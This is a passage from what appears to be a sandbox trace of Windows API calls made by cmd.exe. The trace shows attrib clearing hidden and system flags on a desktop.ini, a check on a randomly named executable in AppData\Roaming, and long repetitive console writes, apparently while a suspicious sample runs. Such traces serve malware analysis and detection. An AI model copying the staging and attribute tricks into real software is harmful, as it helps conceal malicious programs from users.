lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0211.063] lstrcmpW (lpString1="\\attrib.exe", lpString2="\\XCOPY.EXE") returned -1 [0211.064] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\attrib.exe", lpCommandLine="attrib -r -s -h \"C:\\Users\\Default\\FAVORI~1\\Links\\desktop.ini\" ", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", lpStartupInfo=0x2af3c4*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="attrib -r -s -h \"C:\\Users\\Default\\FAVORI~1\\Links\\desktop.ini\" ", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x2af410 | out: lpCommandLine="attrib -r -s -h \"C:\\Users\\Default\\FAVORI~1\\Links\\desktop.ini\" ", lpProcessInformation=0x2af410*(hProcess=0x50, hThread=0x4c, dwProcessId=0x974, dwThreadId=0x898)) returned 1 [0211.073] CloseHandle (hObject=0x4c) returned 1 [0211.073] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0211.073] GetEnvironmentStringsW () returned 0x470920* [0211.073] FreeEnvironmentStringsW (penv=0x470920) returned 1 [0211.073] WaitForSingleObject (hHandle=0x50, dwMilliseconds=0xffffffff) returned 0x0 [0211.111] GetExitCodeProcess (in: hProcess=0x50, lpExitCode=0x2af304 | out: lpExitCode=0x2af304*=0x0) returned 1 [0211.111] CloseHandle (hObject=0x50) returned 1 [0211.111] _vsnwprintf (in: _Buffer=0x2af44c, _BufferCount=0x13, _Format="%08X", _ArgList=0x2af310 | out: _Buffer="00000000") returned 8 [0211.111] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0211.111] GetEnvironmentStringsW () returned 0x4725b0* [0211.111] FreeEnvironmentStringsW (penv=0x4725b0) returned 1 [0211.112] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0211.112] GetEnvironmentStringsW () returned 0x4725b0* [0211.112] FreeEnvironmentStringsW (penv=0x4725b0) returned 1 [0211.112] DeleteProcThreadAttributeList (in: lpAttributeList=0x2af368 | out: lpAttributeList=0x2af368) [0211.112] GetConsoleTitleW (in: lpConsoleTitle=0x2af6e8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0211.112] GetFileAttributesW (lpFileName="C:\\Users\\Default\\FAVORI~1\\Links\\desktop.ini" (normalized: "c:\\users\\default\\favori~1\\links\\desktop.ini")) returned 0x20 [0211.112] GetFileAttributesW (lpFileName="C:\\Users\\Default\\FAVORI~1\\Links" (normalized: "c:\\users\\default\\favori~1\\links")) returned 0x11 [0211.112] _wcsicmp (_String1="desktop.ini", _String2=".") returned 54 [0211.112] _wcsicmp (_String1="desktop.ini", _String2="..") returned 54 [0211.112] GetFileAttributesW (lpFileName="C:\\Users\\Default\\FAVORI~1\\Links\\desktop.ini" (normalized: "c:\\users\\default\\favori~1\\links\\desktop.ini")) returned 0x20 [0211.113] FindNextFileW (in: hFindFile=0x46e640, lpFindFileData=0x47363c | out: lpFindFileData=0x47363c) returned 0 [0211.113] GetLastError () returned 0x12 [0211.113] FindClose (in: hFindFile=0x46e640 | out: hFindFile=0x46e640) returned 1 [0211.114] _open_osfhandle (_OSFileHandle=0x50, _Flags=8) returned 1 [0211.114] GetConsoleTitleW (in: lpConsoleTitle=0x2af684, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0211.115] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\vmfcce~1\\xey8d7zi.exe")) returned 0x2020 [0211.115] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.116] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.116] GetFileType (hFile=0x50) returned 0x1 [0211.116] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.116] GetFileType (hFile=0x50) returned 0x1 [0211.116] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.116] WriteFile (in: hFile=0x50, lpBuffer=0x2aef84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae168, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesWritten=0x2ae168*=0x50, lpOverlapped=0x0) returned 1 [0211.117] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.117] GetFileType (hFile=0x50) returned 0x1 [0211.117] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.117] WriteFile (in: hFile=0x50, lpBuffer=0x2aefd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae168, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesWritten=0x2ae168*=0x50, lpOverlapped=0x0) returned 1 [0211.117] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.117] GetFileType (hFile=0x50) returned 0x1 [0211.117] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.117] WriteFile (in: hFile=0x50, lpBuffer=0x2af024*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae168, lpOverlapped=0x0 | out: lpBuffer=0x2af024*, lpNumberOfBytesWritten=0x2ae168*=0x50, lpOverlapped=0x0) returned 1 [0211.118] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.118] GetFileType (hFile=0x50) returned 0x1 [0211.118] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.118] WriteFile (in: hFile=0x50, lpBuffer=0x2af074*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae168, lpOverlapped=0x0 | out: lpBuffer=0x2af074*, lpNumberOfBytesWritten=0x2ae168*=0x50, lpOverlapped=0x0) returned 1 [0211.118] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.118] GetFileType (hFile=0x50) returned 0x1 [0211.118] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.118] WriteFile (in: hFile=0x50, lpBuffer=0x2af0c4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae168, lpOverlapped=0x0 | out: lpBuffer=0x2af0c4*, lpNumberOfBytesWritten=0x2ae168*=0x50, lpOverlapped=0x0) returned 1 [0211.118] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.118] GetFileType (hFile=0x50) returned 0x1 [0211.118] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.118] WriteFile (in: hFile=0x50, lpBuffer=0x2af114*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae168, lpOverlapped=0x0 | out: lpBuffer=0x2af114*, lpNumberOfBytesWritten=0x2ae168*=0x50, lpOverlapped=0x0) returned 1 [0211.118] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.118] GetFileType (hFile=0x50) returned 0x1 [0211.118] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.118] WriteFile (in: hFile=0x50, lpBuffer=0x2af164*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ae168, lpOverlapped=0x0 | out: lpBuffer=0x2af164*, lpNumberOfBytesWritten=0x2ae168*=0x20, lpOverlapped=0x0) returned 1 [0211.118] _get_osfhandle (_FileHandle=4) returned 0x58 [0211.118] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ae154 | out: lpNewFilePointer=0x0) returned 1 [0211.118] _get_osfhandle (_FileHandle=4) returned 0x58 [0211.119] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.119] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.119] GetFileType (hFile=0x50) returned 0x1 [0211.119] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.119] GetFileType (hFile=0x50) returned 0x1 [0211.119] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.119] WriteFile (in: hFile=0x50, lpBuffer=0x2aef84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae168, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesWritten=0x2ae168*=0x50, lpOverlapped=0x0) returned 1 [0211.119] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.119] GetFileType (hFile=0x50) returned 0x1 [0211.119] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.119] WriteFile (in: hFile=0x50, lpBuffer=0x2aefd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae168, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesWritten=0x2ae168*=0x50, lpOverlapped=0x0) returned 1 [0211.119] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.119] GetFileType (hFile=0x50) returned 0x1 [0211.119] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.119] WriteFile (in: hFile=0x50, lpBuffer=0x2af024*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae168, lpOverlapped=0x0 | out: lpBuffer=0x2af024*, lpNumberOfBytesWritten=0x2ae168*=0x50, lpOverlapped=0x0) returned 1 [0211.119] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.119] GetFileType (hFile=0x50) returned 0x1 [0211.119] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.119] WriteFile (in: hFile=0x50, lpBuffer=0x2af074*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae168, lpOverlapped=0x0 | out: lpBuffer=0x2af074*, lpNumberOfBytesWritten=0x2ae168*=0x50, lpOverlapped=0x0) returned 1 [0211.119] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.119] GetFileType (hFile=0x50) returned 0x1 [0211.119] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.119] WriteFile (in: hFile=0x50, lpBuffer=0x2af0c4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae168, lpOverlapped=0x0 | out: lpBuffer=0x2af0c4*, lpNumberOfBytesWritten=0x2ae168*=0x50, lpOverlapped=0x0) returned 1 [0211.119] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.119] GetFileType (hFile=0x50) returned 0x1 [0211.119] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.120] WriteFile (in: hFile=0x50, lpBuffer=0x2af114*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae168, lpOverlapped=0x0 | out: lpBuffer=0x2af114*, lpNumberOfBytesWritten=0x2ae168*=0x50, lpOverlapped=0x0) returned 1 [0211.120] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.120] GetFileType (hFile=0x50) returned 0x1 [0211.120] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.120] WriteFile (in: hFile=0x50, lpBuffer=0x2af164*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ae168, lpOverlapped=0x0 | out: lpBuffer=0x2af164*, lpNumberOfBytesWritten=0x2ae168*=0x20, lpOverlapped=0x0) returned 1 [0211.120] _get_osfhandle (_FileHandle=4) returned 0x58 [0211.120] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ae154 | out: lpNewFilePointer=0x0) returned 1 [0211.120] _get_osfhandle (_FileHandle=4) returned 0x58 [0211.120] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.120] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.120] GetFileType (hFile=0x50) returned 0x1 [0211.120] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.120] GetFileType (hFile=0x50) returned 0x1 [0211.120] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.120] WriteFile (in: hFile=0x50, lpBuffer=0x2aef84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae168, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesWritten=0x2ae168*=0x50, lpOverlapped=0x0) returned 1 [0211.120] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.120] GetFileType (hFile=0x50) returned 0x1 [0211.120] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.120] WriteFile (in: hFile=0x50, lpBuffer=0x2aefd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae168, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesWritten=0x2ae168*=0x50, lpOverlapped=0x0) returned 1 [0211.120] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.120] GetFileType (hFile=0x50) returned 0x1 [0211.120] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.120] WriteFile (in: hFile=0x50, lpBuffer=0x2af024*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae168, lpOverlapped=0x0 | out: lpBuffer=0x2af024*, lpNumberOfBytesWritten=0x2ae168*=0x50, lpOverlapped=0x0) returned 1 [0211.120] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.120] GetFileType (hFile=0x50) returned 0x1 [0211.120] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.120] WriteFile (in: hFile=0x50, lpBuffer=0x2af074*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae168, lpOverlapped=0x0 | out: lpBuffer=0x2af074*, lpNumberOfBytesWritten=0x2ae168*=0x50, lpOverlapped=0x0) returned 1 [0211.120] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.120] GetFileType (hFile=0x50) returned 0x1 [0211.121] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.121] WriteFile (in: hFile=0x50, lpBuffer=0x2af0c4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae168, lpOverlapped=0x0 | out: lpBuffer=0x2af0c4*, lpNumberOfBytesWritten=0x2ae168*=0x50, lpOverlapped=0x0) returned 1 [0211.121] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.121] GetFileType (hFile=0x50) returned 0x1 [0211.121] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.121] WriteFile (in: hFile=0x50, lpBuffer=0x2af114*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae168, lpOverlapped=0x0 | out: lpBuffer=0x2af114*, lpNumberOfBytesWritten=0x2ae168*=0x50, lpOverlapped=0x0) returned 1 [0211.121] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.121] GetFileType (hFile=0x50) returned 0x1 [0211.121] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.121] WriteFile (in: hFile=0x50, lpBuffer=0x2af164*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ae168, lpOverlapped=0x0 | out: lpBuffer=0x2af164*, lpNumberOfBytesWritten=0x2ae168*=0x20, lpOverlapped=0x0) returned 1 [0211.121] _get_osfhandle (_FileHandle=4) returned 0x58 [0211.121] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ae154 | out: lpNewFilePointer=0x0) returned 1 [0211.121] _get_osfhandle (_FileHandle=4) returned 0x58 [0211.121] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.121] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.121] GetFileType (hFile=0x50) returned 0x1 [0211.121] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.121] GetFileType (hFile=0x50) returned 0x1 [0211.121] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.121] WriteFile (in: hFile=0x50, lpBuffer=0x2aef84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae168, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesWritten=0x2ae168*=0x50, lpOverlapped=0x0) returned 1 [0211.121] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.121] GetFileType (hFile=0x50) returned 0x1 [0211.121] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.121] WriteFile (in: hFile=0x50, lpBuffer=0x2aefd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae168, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesWritten=0x2ae168*=0x50, lpOverlapped=0x0) returned 1 [0211.121] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.121] GetFileType (hFile=0x50) returned 0x1 [0211.121] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.121] WriteFile (in: hFile=0x50, lpBuffer=0x2af024*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae168, lpOverlapped=0x0 | out: lpBuffer=0x2af024*, lpNumberOfBytesWritten=0x2ae168*=0x50, lpOverlapped=0x0) returned 1 [0211.121] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.121] GetFileType (hFile=0x50) returned 0x1 [0211.122] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.122] WriteFile (in: hFile=0x50, lpBuffer=0x2af074*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae168, lpOverlapped=0x0 | out: lpBuffer=0x2af074*, lpNumberOfBytesWritten=0x2ae168*=0x50, lpOverlapped=0x0) returned 1 [0211.122] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.122] GetFileType (hFile=0x50) returned 0x1 [0211.122] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.122] WriteFile (in: hFile=0x50, lpBuffer=0x2af0c4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae168, lpOverlapped=0x0 | out: lpBuffer=0x2af0c4*, lpNumberOfBytesWritten=0x2ae168*=0x50, lpOverlapped=0x0) returned 1 [0211.122] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.122] GetFileType (hFile=0x50) returned 0x1 [0211.122] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.122] WriteFile (in: hFile=0x50, lpBuffer=0x2af114*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae168, lpOverlapped=0x0 | out: lpBuffer=0x2af114*, lpNumberOfBytesWritten=0x2ae168*=0x50, lpOverlapped=0x0) returned 1 [0211.122] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.122] GetFileType (hFile=0x50) returned 0x1 [0211.122] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.122] WriteFile (in: hFile=0x50, lpBuffer=0x2af164*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ae168, lpOverlapped=0x0 | out: lpBuffer=0x2af164*, lpNumberOfBytesWritten=0x2ae168*=0x20, lpOverlapped=0x0) returned 1 [0211.122] _get_osfhandle (_FileHandle=4) returned 0x58 [0211.122] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ae154 | out: lpNewFilePointer=0x0) returned 1 [0211.122] _get_osfhandle (_FileHandle=4) returned 0x58 [0211.122] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.122] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.122] GetFileType (hFile=0x50) returned 0x1 [0211.122] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.122] GetFileType (hFile=0x50) returned 0x1 [0211.122] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.122] WriteFile (in: hFile=0x50, lpBuffer=0x2aef84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae168, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesWritten=0x2ae168*=0x50, lpOverlapped=0x0) returned 1 [0211.122] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.122] GetFileType (hFile=0x50) returned 0x1 [0211.122] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.122] WriteFile (in: hFile=0x50, lpBuffer=0x2aefd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae168, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesWritten=0x2ae168*=0x50, lpOverlapped=0x0) returned 1 [0211.122] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.122] GetFileType (hFile=0x50) returned 0x1 [0211.122] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.123] WriteFile (in: hFile=0x50, lpBuffer=0x2af024*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae168, lpOverlapped=0x0 | out: lpBuffer=0x2af024*, lpNumberOfBytesWritten=0x2ae168*=0x50, lpOverlapped=0x0) returned 1 [0211.123] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.123] GetFileType (hFile=0x50) returned 0x1 [0211.123] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.123] WriteFile (in: hFile=0x50, lpBuffer=0x2af074*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae168, lpOverlapped=0x0 | out: lpBuffer=0x2af074*, lpNumberOfBytesWritten=0x2ae168*=0x50, lpOverlapped=0x0) returned 1 [0211.123] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.123] GetFileType (hFile=0x50) returned 0x1 [0211.123] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.123] WriteFile (in: hFile=0x50, lpBuffer=0x2af0c4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae168, lpOverlapped=0x0 | out: lpBuffer=0x2af0c4*, lpNumberOfBytesWritten=0x2ae168*=0x50, lpOverlapped=0x0) returned 1 [0211.123] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.123] GetFileType (hFile=0x50) returned 0x1 [0211.123] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.123] WriteFile (in: hFile=0x50, lpBuffer=0x2af114*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae168, lpOverlapped=0x0 | out: lpBuffer=0x2af114*, lpNumberOfBytesWritten=0x2ae168*=0x50, lpOverlapped=0x0) returned 1 [0211.123] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.123] GetFileType (hFile=0x50) returned 0x1 [0211.123] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.123] WriteFile (in: hFile=0x50, lpBuffer=0x2af164*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ae168, lpOverlapped=0x0 | out: lpBuffer=0x2af164*, lpNumberOfBytesWritten=0x2ae168*=0x20, lpOverlapped=0x0) returned 1 [0211.123] _get_osfhandle (_FileHandle=4) returned 0x58 [0211.123] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ae154 | out: lpNewFilePointer=0x0) returned 1 [0211.123] _get_osfhandle (_FileHandle=4) returned 0x58 [0211.123] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.123] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.123] GetFileType (hFile=0x50) returned 0x1 [0211.123] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.123] GetFileType (hFile=0x50) returned 0x1 [0211.123] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.123] WriteFile (in: hFile=0x50, lpBuffer=0x2aef84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae168, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesWritten=0x2ae168*=0x50, lpOverlapped=0x0) returned 1 [0211.123] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.123] GetFileType (hFile=0x50) returned 0x1 [0211.124] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.124] WriteFile (in: hFile=0x50, lpBuffer=0x2aefd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae168, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesWritten=0x2ae168*=0x50, lpOverlapped=0x0) returned 1 [0211.124] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.124] GetFileType (hFile=0x50) returned 0x1 [0211.124] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.124] WriteFile (in: hFile=0x50, lpBuffer=0x2af024*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae168, lpOverlapped=0x0 | out: lpBuffer=0x2af024*, lpNumberOfBytesWritten=0x2ae168*=0x50, lpOverlapped=0x0) returned 1 [0211.124] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.124] GetFileType (hFile=0x50) returned 0x1 [0211.124] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.124] WriteFile (in: hFile=0x50, lpBuffer=0x2af074*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae168, lpOverlapped=0x0 | out: lpBuffer=0x2af074*, lpNumberOfBytesWritten=0x2ae168*=0x50, lpOverlapped=0x0) returned 1 [0211.124] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.124] GetFileType (hFile=0x50) returned 0x1 [0211.124] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.124] WriteFile (in: hFile=0x50, lpBuffer=0x2af0c4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae168, lpOverlapped=0x0 | out: lpBuffer=0x2af0c4*, lpNumberOfBytesWritten=0x2ae168*=0x50, lpOverlapped=0x0) returned 1 [0211.124] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.124] GetFileType (hFile=0x50) returned 0x1 [0211.124] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.124] WriteFile (in: hFile=0x50, lpBuffer=0x2af114*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae168, lpOverlapped=0x0 | out: lpBuffer=0x2af114*, lpNumberOfBytesWritten=0x2ae168*=0x50, lpOverlapped=0x0) returned 1 [0211.124] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.124] GetFileType (hFile=0x50) returned 0x1 [0211.124] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.124] WriteFile (in: hFile=0x50, lpBuffer=0x2af164*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ae168, lpOverlapped=0x0 | out: lpBuffer=0x2af164*, lpNumberOfBytesWritten=0x2ae168*=0x20, lpOverlapped=0x0) returned 1 [0211.124] _get_osfhandle (_FileHandle=4) returned 0x58 [0211.124] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ae154 | out: lpNewFilePointer=0x0) returned 1 [0211.125] _get_osfhandle (_FileHandle=4) returned 0x58 [0211.125] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.125] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.125] GetFileType (hFile=0x50) returned 0x1 [0211.125] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.125] GetFileType (hFile=0x50) returned 0x1 [0211.125] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.125] WriteFile (in: hFile=0x50, lpBuffer=0x2aef84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae168, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesWritten=0x2ae168*=0x50, lpOverlapped=0x0) returned 1 [0211.125] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.125] GetFileType (hFile=0x50) returned 0x1 [0211.125] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.125] WriteFile (in: hFile=0x50, lpBuffer=0x2aefd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae168, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, 